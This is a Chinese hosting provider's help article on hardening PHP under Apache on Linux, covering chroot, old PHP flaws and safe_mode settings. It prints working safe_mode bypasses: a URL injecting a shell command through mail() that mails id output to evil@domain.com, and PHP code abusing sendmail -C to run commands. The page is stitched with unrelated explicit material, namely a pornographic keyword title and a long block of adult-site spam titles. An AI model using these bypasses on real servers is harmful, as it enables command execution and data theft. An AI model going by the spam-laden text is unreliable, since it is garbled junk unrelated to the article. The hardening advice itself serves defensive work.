a毛片毛费观看-a毛片在线-a毛片在线观看-a毛片在线免费观看-国产成人综合洲欧美在线-国产成人综合高清在线观看

始創(chuàng)于2000年 股票代碼:831685
咨詢熱線:0371-60135900 注冊有禮 登錄
  • 掛牌上市企業(yè)
  • 60秒人工響應(yīng)
  • 99.99%連通率
  • 7*24h人工
  • 故障100倍補(bǔ)償
全部產(chǎn)品
您的位置: 網(wǎng)站首頁 > 幫助中心>文章內(nèi)容

Linux操作系統(tǒng)下PHP服務(wù)器安全配置技巧

發(fā)布時(shí)間:  2012/8/11 11:06:00
  一、Web服務(wù)器安全PHP其實(shí)不過是Web服務(wù)器的一個(gè)模塊功能,所以首先要保證Web服務(wù)器的安全。當(dāng)然Web服務(wù)器要安全又必須是先保證系統(tǒng)安全,這樣就扯遠(yuǎn)了,無窮無盡。PHP可以和各種Web服務(wù)器結(jié)合,這里也只討論Apache。非常建議以chroot方式安裝啟動Apache,這樣即使Apache和PHP及其腳本出現(xiàn)漏洞,受影響的也只有這個(gè)禁錮的系統(tǒng),不會危害實(shí)際系統(tǒng)。但是使用chroot的Apache后,給應(yīng)用也會帶來一定的麻煩,比如連接mysql時(shí)必須用127.0.0.1地址使用tcp連接而不能用localhost實(shí)現(xiàn)socket連接,這在效率上會稍微差一點(diǎn)。還有mail函數(shù)發(fā)送郵件也是個(gè)問題,因?yàn)閜hp.ini里的:
[mailfunction];ForWin32only.SMTP=localhost;ForWin32only.sendmail_from=me@localhost.com都是針對Win32平臺,所以需要在chroot環(huán)境下調(diào)整好sendmail。二、PHP本身問題1、遠(yuǎn)程溢出PHP-4.1.2以下的所有版本都存在文件上傳遠(yuǎn)程緩沖區(qū)溢出漏洞,而且攻擊程序已經(jīng)廣泛流傳,成功率非常高:http://packetstormsecurity.org/0204-exploits/7350funhttp://hsj.shadowpenguin.org/misc/php3018_exp.txt2、遠(yuǎn)程拒絕服務(wù)PHP-4.2.0和PHP-4.2.1存在PHPmultipart/form-dataPOST請求處理遠(yuǎn)程漏洞,雖然不能獲得本地用戶權(quán)限,但是也能造成拒絕服務(wù)。3、safe_mode繞過漏洞還有PHP-4.2.2以下到PHP-4.0.5版本都存在PHPmail函數(shù)繞過safe_mode限制執(zhí)行命令漏洞,4.0.5版本開始mail函數(shù)增加了第五個(gè)參數(shù),由于設(shè)計(jì)者考慮不周可以突破safe_mode的限制執(zhí)行命令。其中4.0.5版本突破非常簡單,只需用分號隔開后面加shell命令就可以了,比如存在PHP腳本evil.php:
<?mail("foo@bar,"foo","bar","",$bar);?>執(zhí)行如下的URL:http://foo.com/evil.php?bar=;/usr/bin/id|mailevil@domain.com這將id執(zhí)行的結(jié)果發(fā)送給evil@domain.com。對于4.0.6至4.2.2的PHP突破safe_mode限制其實(shí)是利用了sendmail的-C參數(shù),所以系統(tǒng)必須是使用sendmail。如下的代碼能夠突破safe_mode限制執(zhí)行命令:
<?#注意,下面這兩個(gè)必須是不存在的,或者它們的屬主和本腳本的屬主是一樣$script="/tmp/script123";$cf="/tmp/cf123";$fd=fopen($cf,"w");fwrite($fd,"OQ/tmpSparse=0R$*".chr(9)."$#local$@$1$:$1Mlocal,P=/bin/sh,A=sh$script");fclose($fd);$fd=fopen($script,"w");fwrite($fd,"rm-f$script$cf;");fwrite($fd,$cmd);fclose($fd);mail("nobody","","","","-C$cf");?>還是使用以上有問題版本PHP的用戶一定要及時(shí)升級到最新版本,這樣才能消除基本的安全問題。
三、PHP本身的安全配置PHP的配置非常靈活,可以通過php.ini,httpd.conf,.htaccess文件(該目錄必須設(shè)置了AllowOverrideAll或Options)進(jìn)行設(shè)置,還可以在腳本程序里使用ini_set()及其他的特定的函數(shù)進(jìn)行設(shè)置。通過phpinfo()和get_cfg_var()函數(shù)可以得到配置選項(xiàng)的各個(gè)值。如果配置選項(xiàng)是唯一PHP_INI_SYSTEM屬性的,必須通過php.ini和httpd.conf來修改,它們修改的是PHP的Master值,但修改之后必須重啟apache才能生效。其中php.ini設(shè)置的選項(xiàng)是對Web服務(wù)器所有腳本生效,httpd.conf里設(shè)置的選項(xiàng)是對該定義的目錄下所有腳本生效。如果還有其他的PHP_INI_USER,PHP_INI_PERDIR,PHP_INI_ALL屬性的選項(xiàng)就可以使用.htaccess文件設(shè)置,也可以通過在腳本程序自身用ini_set()函數(shù)設(shè)定,它們修改的是Local值,改了以后馬上生效。但是.htaccess只對當(dāng)前目錄的腳本程序生效,ini_set()函數(shù)只對該腳本程序設(shè)置ini_set()函數(shù)以后的代碼生效。各個(gè)版本的選項(xiàng)屬性可能不盡相同,可以用如下命令查找當(dāng)前源代碼的main.c文件得到所有的選項(xiàng),以及它的屬性:
#grepPHP_INI_/PHP_SRC/main/main.c在討論P(yáng)HP安全配置之前,應(yīng)該好好了解PHP的safe_mode模式。1、safe_modesafe_mode是唯一PHP_INI_SYSTEM屬性,必須通過php.ini或httpd.conf來設(shè)置。要啟用safe_mode,只需修改php.ini:safe_mode=On或者修改httpd.conf,定義目錄:
<Directory/var/www>OptionsFollowSymLinksphp_admin_valuesafe_mode1</Directory>重啟apache后safe_mode就生效了。啟動safe_mode,會對許多PHP函數(shù)進(jìn)行限制,特別是和系統(tǒng)相關(guān)的文件打開、命令執(zhí)行等函數(shù)。所有操作文件的函數(shù)將只能操作與腳本UID相同的文件,比如test.php腳本的內(nèi)容為:
<?include("index.html")?>幾個(gè)文件的屬性如下:#ls-latotal13drwxr-xr-x2rootroot104Jul2001:25.drwxr-xr-x16rootroot384Jul1812:02..-rw-r--r--1rootroot4110Oct262002index.html-rw-r--r--1www-datawww-data41Jul1919:14test.php在瀏覽器請求test.php會提示如下的錯(cuò)誤信息:Warning:SAFEMODERestrictionineffect.Thescriptwhoseuid/gidis33/33isnotallowedtoaccess./index.htmlownedbyuid/gid0/0in/var/www/test.phponline1如果被操作文件所在目錄的UID和腳本UID一致,那么該文件的UID即使和腳本不同也可以訪問的,不知這是否是PHP的一個(gè)漏洞還是另有隱情。所以php腳本屬主這個(gè)用戶最好就只作這個(gè)用途,絕對禁止使用root做為php腳本的屬主,這樣就達(dá)不到safe_mode的效果了。如果想將其放寬到GID比較,則打開safe_mode_gid可以考慮只比較文件的GID,可以設(shè)置如下選項(xiàng):safe_mode_gid=On設(shè)置了safe_mode以后,所有命令執(zhí)行的函數(shù)將被限制只能執(zhí)行php.ini里safe_mode_exec_dir指定目錄里的程序,而且shell_exec、`ls-l`這種執(zhí)行命令的方式會被禁止。如果確實(shí)需要調(diào)用其它程序,可以在php.ini做如下設(shè)置:safe_mode_exec_dir=/usr/local/php/exec然后拷貝程序到該目錄,那么php腳本就可以用system等函數(shù)來執(zhí)行該程序。而且該目錄里的shell腳本還是可以調(diào)用其它目錄里的系統(tǒng)命令。safe_mode_include_dirstring當(dāng)從此目錄及其子目錄(目錄必須在include_path中或者用完整路徑來包含)包含文件時(shí)越過UID/GID檢查。從PHP4.2.0開始,本指令可以接受和include_path指令類似的風(fēng)格用分號隔開的路徑,而不只是一個(gè)目錄。指定的限制實(shí)際上是一個(gè)前綴,而非一個(gè)目錄名。這也就是說“safe_mode_include_dir=/dir/incl”將允許訪問“/dir/include”和“/dir/incls”,如果它們存在。如果您希望將訪問控制在一個(gè)指定的目錄,那么請?jiān)诮Y(jié)尾加上一個(gè)斜線,例如:“safe_mode_include_dir=/dir/incl/”。safe_mode_allowed_env_varsstring設(shè)置某些環(huán)境變量可能是潛在的安全缺口。本指令包含有一個(gè)逗號分隔的前綴列表。在安全模式下,用戶只能改變那些名字具有在這里提供的前綴的環(huán)境變量。默認(rèn)情況下,用戶只能設(shè)置以PHP_開頭的環(huán)境變量(例如PHP_FOO=BAR)。注:如果本指令為空,PHP將使用戶可以修改任何環(huán)境變量!safe_mode_protected_env_varsstring本指令包含有一個(gè)逗號分隔的環(huán)境變量的列表,最終用戶不能用putenv()來改變這些環(huán)境變量。甚至在safe_mode_allowed_env_vars中設(shè)置了允許修改時(shí)也不能改變這些變量。雖然safe_mode不是萬能的(低版本的PHP可以繞過),但還是強(qiáng)烈建議打開安全模式,在一定程度上能夠避免一些未知的攻擊。不過啟用safe_mode會有很多限制,可能對應(yīng)用帶來影響,所以還需要調(diào)整代碼和配置才能和諧。被安全模式限制或屏蔽的函數(shù)可以參考PHP手冊。討論完safe_mode后,下面結(jié)合程序代碼實(shí)際可能出現(xiàn)的問題討論如何通過對PHP服務(wù)器端的配置來避免出現(xiàn)的漏洞。
本文出自:億恩科技【www.ibaoshan.net】

服務(wù)器租用/服務(wù)器托管中國五強(qiáng)!虛擬主機(jī)域名注冊頂級提供商!15年品質(zhì)保障!--億恩科技[ENKJ.COM]

  • 您可能在找
  • 億恩北京公司:
  • 經(jīng)營性ICP/ISP證:京B2-20150015
  • 億恩鄭州公司:
  • 經(jīng)營性ICP/ISP/IDC證:豫B1.B2-20060070
  • 億恩南昌公司:
  • 經(jīng)營性ICP/ISP證:贛B2-20080012
  • 服務(wù)器/云主機(jī) 24小時(shí)售后服務(wù)電話:0371-60135900
  • 虛擬主機(jī)/智能建站 24小時(shí)售后服務(wù)電話:0371-60135900
  • 專注服務(wù)器托管17年
    掃掃關(guān)注-微信公眾號
    0371-60135900
    Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權(quán)所有  地址:鄭州市高新區(qū)翠竹街1號總部企業(yè)基地億恩大廈  法律顧問:河南亞太人律師事務(wù)所郝建鋒、杜慧月律師   京公網(wǎng)安備41019702002023號
      0
     
     
     
     

    0371-60135900
    7*24小時(shí)客服服務(wù)熱線

     
     
    国产成人精品综合久久久久| 日日摸夜夜添夜夜添AV| 豆国产97在线 | 亚洲| 亚洲人成网站在线播放2020| 日产一二三区别免费必看| 精品欧美H无遮挡在线看中文 | 亚洲AV图片一亚洲AV| 男女嘿咻发声动态图| 国产裸拍裸体女网站链接在线观看| 777爽死你免费看一二区无码| 小东西几天没做又紧了| 欧美日韩一区二区在线视频精品| 韩国办公室三级HD激情在线观看| 拔萝卜视频免费播放在线观看| 亚洲欧美日韩另类| 上边一面亲下边一面膜的注意事项| 可播放的免费男同GAY| 国产乱子伦在线观看| PETEDAVIDSON鸟多长| 亚洲精品无码专区久久| 日韩一区国产二区欧美三区| 可以差差差的视频无掩盖| 国产国语对白又大又粗又爽| 70歳の熟女セックス| 亚洲成A人片在线观看中文无码 | 肉色超薄丝袜脚交一区二区| 久久亚洲AV成人无码一区二区| 国产精品国产三级国产AV中文| ASSPICS亚洲美女裸体CH| 亚洲国产精品无码中文字满 | 超碰人人澡人人胔| 一二三四影视在线观看免费视频 | 国产乱AⅤ一区二区三区| JAPANESE人妻少妇| 亚洲色婷婷综合开心网| 铜铜铜铜铜铜铜铜好大好深色| 内射人妻视频国内| 极品少妇被猛得白浆直流草莓视频 | 亚洲中文字幕无码永久在线不卡| 天天做天天摸天天爽天天爱| 欧美粗大强交18P直喷水| 精品无码国产污污污免费网站| 公交车后车座的疯狂的做| 97久久人人超碰超碰窝窝| 亚洲精品AⅤ在线观看| 天黑黑影院免费观看视频在线播放| 欧美丰满熟妇XXXX性大屁股| 久久国产精久久精产国| 国产精品久久久久久久久免费| YY8840私人影院爱不停下载| 亚洲一区二区三区波多野结衣 | 日本XXXX色视频在线播放| 久久亚洲精品中文字幕波多野结衣| 国产免费观看久久黄AV片| 超碰97人人做人人爱亚洲尤物| 中文字幕AV无码一区二区三区电 | 亚洲国产精品成人AV在线| 高清性色生活片97 | 日本熟妇色XXXXX日本老妇| 久久中文字幕无码中文字幕有码| 国产日产欧产美韩系列麻豆| 成 人 免 费 黄 色 网站无| 在线V观看免费国岛国片| 亚洲AV永久无码精品古装片| 色欲香天天天综合网站| 欧美三级在线播放| 久久久久久久性潮| 国产亚洲精品A在线无码| 俄罗斯女人与马Z00Z视频| AV无码天堂一区二区三区| 亚洲男同帅GAY片在线观看| 无码少妇丰满熟妇一区二区| 日本高清色视频WWW·174| 男女久久久国产一区二区三区| 久爱无码精品免费视频在线观看| 国产乱XXXXX97国语对白| 大肉大捧一进一出视频| ASS鲜嫩鲜嫩PICS日本| 要灬要灬再深点受不了好舒服 | 国产亚洲精选美女久久久久| 跟40岁的少妇做一次就不硬了| FREE性欧美╳╳╳HD| 在线观看无码AV网站永久| 亚洲精品成人无码| 午夜DJ影院免费直播观看完整版| 三级无码在钱AV无码在钱| 欧美一区二区三区性视频野战| 毛很浓密超多黑毛的少妇| 久久A级毛片免费观看| 国精产品砖一区二区三区糖心| 国产成人无码AV在线播放无广告 | 999精产国品一二三产区区| 夜夜躁婷婷AV蜜桃妖精视频| 亚洲丰满少妇自摸| 无遮挡色视频真人免费不卡| 色猫咪AV在线网址| 人妻互换免费中文字幕| 免费影视观看网站入口| 久久人妻夜夜做天天爽| 精品3D动画肉动漫在线无码| 国产乱妇乱子在线视频| 疯狂做受XXXX高潮国产| 边做奶水边喷H高H共妻| 99精品电影一区二区免费看| 在线观看无码H片| 亚洲熟妇色XXXXX欧美老妇Y| 亚洲AV无码成人影院一尤物区| 无码夫の前で人妻を侵犯| 色窝窝无码一区二区三区| 人妻波多野结衣爽到喷水| 欧美成人激情视频| 免费A级毛片无码樱桃视频 | 男人吃奶摸下挵进去好爽| 久久夜色精品国产网站| 一边做饭一边躁狂我会怎么样呢| 亚洲尤码不卡AV麻豆| 亚洲 日本 欧美 中文幕| 天堂√最新版中文在线地址| 日产精品一线二线三线优势| 女人和拘做受A级毛片| 老旺大肉蟒进进出出电影免费| 久久国产精品免费一区二区三区| 黑人巨根在线观看| 国产无套内射普通话对白 | 奇米综合四色77777久久| 女高中生自慰污污网站| 旅人蕉天堂鸟的区别视频| 久久人人爽人人爽人人片AV超碰| 久久99精品国产99久久6尤物| 护士奶头又白又大又好摸| 国产一码二码三码区别| 国产精品人成在线播放新网站| 国产成 人 黄 色 网 站 小说| 丰满的人妻沦为玩物在线| 刺激交换经历过程小说| 波多野结衣AV中文一区二区三区 | 欧美性激烈粗大精品XXX| 男人扒开女人下部添高潮的视频 | 又大又粗又硬又爽黄毛少妇| 野花日本HD免费高清版视频| 亚洲熟妇A∨日韩熟妇在线| 亚洲精品国产综合久久一线| 亚洲大尺度专区无码| 亚洲av无码一区二区三区dv| 亚洲AV无码成H在线观看| 亚洲AV成人片色在线观看www| 亚州中文字幕无码中文字幕| 洗澡被公强奷30分钟视频| 午夜亚洲AⅤ无码高潮片在线观看| 无码中文AV有码中文AV| 无码中文字幕日韩专区| 午夜免费福利小电影| 性色欲网站人妻丰满中文久久不卡| 香港三日本三级少妇三级2021| 午夜三级手机在线电影| 小受呻吟高潮GV在线观看| 香蕉免费一区二区三区| 小寡妇好紧进去了好大看视频| 性妇WBBBB搡BBBB嗓1| 亚洲AV片毛片成人观看| 亚洲AV中文无码乱人伦下载| 亚洲国产精品久久久久蜜桃| 亚洲乱人伦中文字幕无码| 亚洲色成人www在线观看| 亚洲一卡2卡3卡4卡精品分类| 一本大道一卡2卡三卡4卡国产| 永久AV狼友网站在线观看| 中国极品少妇XXXXX| 18一20亚洲GAY无套| 99无人区码一码二码三码四 | 边做边爱免费完整版视频播放| 成年网站未满十八禁在线观看| 大伊香蕉精品一区视频在线| 公么大龟弄得我好舒服秀婷视频| 国产VIVODESHD精品| 国产精品亚洲VA在线| 国精产品一区一区三区有限| 护士下面好湿好紧好大| 九九精品99久久久香蕉| 久久久久久久精品国产亚洲| 两个奶头被吃到高潮什么感觉| 蜜臀少妇人妻在线| 女刑警被两个黑人挺进| 强开少妇嫩苞又嫩又紧小说| 日产乱码一二三区别免费看| 色噜噜国产精品视频一区二区| 天堂А√在线最新版在线8| 午夜无码一区二区三区在线观看 | 哦┅┅快┅┅用力啊┅┅电影| 欧美一区二区三区视频在线观看| 日本少妇毛茸茸高潮| 室友们都馋我肉馅小水饺| 五月丁香六月午夜成人影院| 亚洲VA欧美VA国产VA综合| 亚洲色成人中文字幕网站| 越看越湿的啪啪的小说免费| 97香蕉超级碰碰碰久久兔费| 俺去俺来也在线WWW色官网| 纯爱无遮挡H肉动漫| 国产精品IGAO视频网|